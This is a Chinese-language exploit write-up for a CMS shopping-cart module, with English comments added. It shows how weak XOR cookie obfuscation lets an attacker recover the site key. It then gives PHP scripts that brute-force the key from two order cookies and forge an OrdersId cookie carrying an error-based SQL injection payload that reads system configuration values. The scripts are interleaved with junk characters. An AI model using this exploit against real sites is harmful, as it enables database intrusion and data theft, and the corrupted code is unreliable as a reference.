www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php中
先看一下这个shopcar类是如何生成cookie的
/**
 * Persists a cart value in a client-side cookie.
 *
 * Arrays are first flattened by enCode() (a=yy&b=cc form, per the note that
 * follows this excerpt), then everything goes through enCrypt() before
 * setcookie(). enCrypt() adds no integrity check (no MAC), so the stored value
 * is only as trustworthy as its obfuscation -- see the notes on enCrypt() and
 * setKey().
 *
 * @param string       $key   cookie name
 * @param string|array $value cookie payload
 */
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // 10-hour lifetime, site-wide path. Only four arguments are passed, so no
    // secure/httponly flags: the cookie also travels over plain HTTP and is
    // readable from script.
    setcookie($key,$value,time()+36000,'/');
}
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
/**
 * Obfuscates $txt for storage in a cookie.
 *
 * Keystream design, as written here:
 *   1. a per-call key is derived as md5(rand(0, 32000)) -- at most 32001
 *      distinct keys, and rand()/srand() are not cryptographic;
 *   2. each output byte pair is <key byte> . (<plaintext byte> XOR <key byte>),
 *      i.e. the key byte itself is emitted next to the XORed byte;
 *   3. the result is passed through setKey() (XOR against a site-wide md5
 *      digest) and base64-encoded.
 * Plain XOR with a tiny per-call key space and no MAC means a single known
 * plaintext/cookie pair narrows the site-wide digest used by setKey() to a
 * handful of candidates (the accompanying write-up shows this); once that
 * digest is known the cookie offers no protection. Mitigation: authenticate
 * the payload with an HMAC (hash_hmac) over a server-side secret and verify it
 * with hash_equals() on read, and use random_bytes() rather than srand()/rand()
 * for any key material.
 *
 * @param string $txt plaintext to obfuscate (byte-wise; strlen/[] are used)
 * @return string base64 of the doubly-XORed stream
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index at 32 (length of an md5 hex digest)
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // key byte is stored in the clear, followed by the XORed plaintext byte
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
/**
 * XORs $txt byte-wise against the repeating hex digest of the site cookie key.
 *
 * The keystream is md5(strtolower($cfg_cookie_encode)): 32 hex characters, so
 * only 16 distinct byte values ever occur in it, cycled over the input.
 * Applying the function twice yields the original input. This is an
 * obfuscation layer, not encryption or authentication: anyone who learns the
 * digest (see the enCrypt() notes) can produce a valid value. An HMAC over the
 * payload is the appropriate integrity mechanism.
 *
 * @param string $txt input bytes (strlen/[] indexing; not multibyte-aware)
 * @return string output of the same length as $txt
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    $keyStream = md5(strtolower($cfg_cookie_encode));
    $keyLen = strlen($keyStream);
    $out = '';
    // cycle the 32-character digest over every byte of the input
    for ($pos = 0, $n = strlen($txt); $pos < $n; $pos++) {
        $out .= $txt[$pos] ^ $keyStream[$pos % $keyLen];
    }
    return $out;
}
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再重新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
具体代码如下:
<?php
) m% ]1 ]- D( y/ f# } F1 _! u" m$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here! q, Z% Y/ l1 r0 [0 |
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
" [1 g! N+ s5 \" ~1 `0 ^% p" m: T$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here! U8 h& T& j4 L4 r# [% w
function reStrCode($code,$string)& r& G9 j* N) V# U _/ c
{% J' J |& W' S/ e
$code = base64_decode($code);6 E7 T9 z! P8 _5 `0 T! X6 }
$key = “”;1 }6 R8 f1 Y1 y( x0 k$ }
for($i=0 ; $i<32 ; $i++)
z/ P! r& p9 X1 C) n{
) j$ G% x% F( y, V$key .= $string[$i] ^ $code[$i];5 o( P8 j8 G) l
}
. [' T3 k- {! E/ q kreturn $key;$ u# }1 [# s& h J. T
}
" R1 Y/ ]+ v1 |function getKeys($cookie,$plantxt)# E D% P; D8 A. \5 E4 y
{1 F$ ~; S# D" @8 c, O
$tmp = $cookie;
( D3 @( F9 O9 V/ ~- M- c$results = array();
. U9 L1 o$ M P( h& Mfor($j=0 ; $j < 32000; $j++)$ ]' M: v+ H1 Y/ [" y8 K/ y2 M# F; \
{
U% @. L! o& v" V+ b- D
2 o. ?. D, F+ ^- l$txt = $plantxt; [# ~) t" \: k& A x& p
$ctr = 0;$ `% f: W5 M7 Z- b" A. v! v
$tmp = ”;
; i5 @+ R7 i& W5 u! b$encrypt_key = md5($j);8 u' ^" I) @8 O3 |0 g2 m
for($i =0; $i < strlen($txt); $i ++)
' s$ F, D( e# b' @ A- y! O, i{( o3 n6 [: w$ d8 T. h/ F9 `
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( ~5 z1 J% H' O) e
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
2 J( N8 r9 W% D& }+ A}/ B9 s8 D! s$ m# Y6 |* F" [
$string = $tmp;
S: q `5 ]& l+ w! R$code = $cookie;5 ?. r4 G0 [4 O7 k$ b; X; E( v! H2 |, I
$result = reStrCode($code,$string);
. }6 P0 [2 B# F2 w0 Iif(eregi(‘^[a-z0-9]+$’,$result))1 g) m4 J# j; T4 Q% L4 i
{
; n( u" j) ^( y* [5 eecho $result.”\n”;( z7 R2 s, X) n1 _; P$ Y+ w
$results[] = $result;
2 g0 E2 @3 U2 U- F4 R! u v& o) n}$ i) t6 h: l0 e$ N0 G
}
! | p( e( K3 h9 J& e7 S! L1 Y# dreturn $results;
( p( J+ r: I) P+ P; {}
. `6 V6 Q5 C7 X. ]% A( Q8 k n6 f$results1 = getKeys($cookie1,$plantxt);1 B" g0 h1 F! P- U( d
$results2 = getKeys($cookie2,$plantxt);
: K# W% b4 Q7 t* {print “\n——————–real key————————–\n”;, k" |2 ?( ~0 k5 M! `: z) e
foreach($results1 as $test1)5 l! \( f# | O Z$ Q
{
- g ?9 w9 l' N% P. r, pforeach($results2 as $test2)
2 s p' H7 ]/ B5 f; c$ ?{
" y R# D0 [3 V& f/ @* ~8 s* z; qif($test1 == $test2)( @& J' {4 W& U% l. i
{
1 y! u0 \; U( C$ Iecho $test1.”\n”;8 m- a, ] N5 V' s# a' g" i0 r7 Z
}7 |! v+ ]: F5 N# P% w
}
/ o% N+ u2 \2 h8 g8 G) w3 t0 k}8 k0 l% t8 S' V+ p7 U' U$ ~
?>9 a4 ~1 W- ]2 ?( [' B$ A9 R
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
' K* E" Y9 d+ y/ lplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到这个key之后,我们就可以构造任意购物车的cookie
接着看
20 class MemberShops. _7 Y# R7 Q: X! S& F/ j
21 {, O7 v7 Z( [( {: u
22 var $OrdersId;; Y1 l, x! a* { p, ?! D+ F4 i) T
23 var $productsId;6 s9 y4 c1 y0 w( f
24
/**
 * Resolves the order id for the current visitor.
 *
 * The id is taken from the "OrdersId" cookie via getCookie() (not in this
 * excerpt; presumably the inverse of saveCookie(), i.e. the value is
 * client-controlled once the cookie obfuscation is known -- confirm). Only when
 * that lookup yields an empty value is a fresh id created by MakeOrders().
 * Consumers that place $this->OrdersId into SQL (see the carbuyaction.php
 * excerpt) must therefore treat it as untrusted input: bind it as a query
 * parameter or validate it against the format MakeOrders() produces.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    // empty() also rejects the string "0", not just null/''
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现OrderId是从cookie里面获取的
然后
/plus/carbuyaction.php中的
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order id recorded for this purchase
// …… (lines omitted from the excerpt)
// $OrdersId originates from the client's "OrdersId" cookie (MemberShops
// constructor) and is concatenated into the query unescaped. Bind it as a
// parameter, or validate it against the format MakeOrders() produces,
// before it reaches the database.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
接着我们就可以注入了
通过利用下面代码生成cookie:
<?php' U1 z( h2 l# e* Z, A Q) l+ ?
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
2 C# }1 B, O, A+ X G0 L$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
0 E( X/ @3 z2 Zfunction setKey($txt)' l2 ]" ?! m: Y! M, u6 q; [: X* O& j' b
{
! x4 u- ~" f( V8 X1 vglobal $encrypt_key;
- p. }* q1 a) h7 z% M% w" P' L' _$ctr = 0;
+ W1 r9 G% |0 p; g# Y' ^0 g$tmp = ”;5 p" z" R( r2 u1 |" o: z O; l4 k
for($i = 0; $i < strlen($txt); $i++)9 e7 Q3 o# A1 N1 `# ^8 P
{' \ ^2 P. h6 f% l( p
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
' F# O/ D8 E+ d& R6 e: `( j$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];- v5 }( A8 j+ h5 ~' J, a
}
; m/ {- y' F7 Z% }return $tmp;. n; |8 \2 C. Y/ R) O6 i2 k' M. D
}) j: }2 H; B2 b5 ^/ L9 o @
function enCrypt($txt)
6 n/ ^6 W$ E N7 A{8 {& q6 m* z- L9 ?/ t: r
srand((double)microtime() * 1000000);
$ K# O. g3 u* X$ B$encrypt_key = md5(rand(0, 32000));7 R& j4 Y. I+ Q# q6 S
$ctr = 0;
2 E2 ?$ n- L9 \& A w$tmp = ”;) E0 `5 ?0 C) E' X1 O
for($i = 0; $i < strlen($txt); $i++)
1 S- X' X& s! G& A- ^# z{, X x) M9 h7 F3 B( V+ g( x
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
" n5 r* p1 u0 f' k* u% @: ] S2 c" ^$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);! L# e3 \. q0 L+ U2 ?7 h* K, E3 \
}" S% v5 s. p. f" v4 J5 B
return base64_encode(setKey($tmp));
/ h( |4 J; Z1 M: x# w}
; a! Y+ c+ _3 R4 ofor($dest =0;$dest = enCrypt($txt);). k% w* Z/ q9 ~. @5 o+ m3 u) ^& D
{
5 K( f8 D+ ]( n4 b7 [: Xif(!strpos($dest,’+'))
6 m) I: L1 D5 V{% y6 C* q* v& }4 i7 @" o& r
break;3 w7 g8 V' ~) G2 f
}
% Y0 |( B- V/ U! v, U; G5 W}
' Q6 L0 E7 L+ eecho $dest.”\n”;7 l- n2 A7 n! a8 b
?>- y t7 e$ `( Q0 s& V4 L
; x5 _. h! i5 Z! G |